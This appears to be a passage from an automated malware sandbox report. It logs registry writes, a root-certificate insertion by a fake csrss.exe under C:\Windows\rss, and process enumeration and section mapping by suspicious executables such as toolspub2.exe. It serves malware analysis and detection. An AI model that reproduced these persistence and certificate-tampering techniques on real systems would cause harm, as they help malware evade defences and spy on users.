Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{CFEDE031-67B6-11EE-A42E-EEDB236BE57B} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30deaea7c3fbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403739529" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f908080c5c8cf442941c5db076e34ac200000000020000000000106600000001000020000000f9d1625a6edecb613ac4ddc1108a57b604fcfbf70162156663218abfaac5d64b000000000e80000000020000200000006afde4f671ccc90b605936f80141c95afacf872631183674585daef85ad7175420000000bb50b9d71f31bfb29738cebff6b68030fb1508b4623714575f0e7ba856a57cbb400000007d8261ab03df51c3add616b020eaff8838ec8ad0763f236457f084e15f6eb8ad597cc88992287b7b62e4171c56b3bf8ece1f4ebbd029cb899412d505bbb43e6c C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
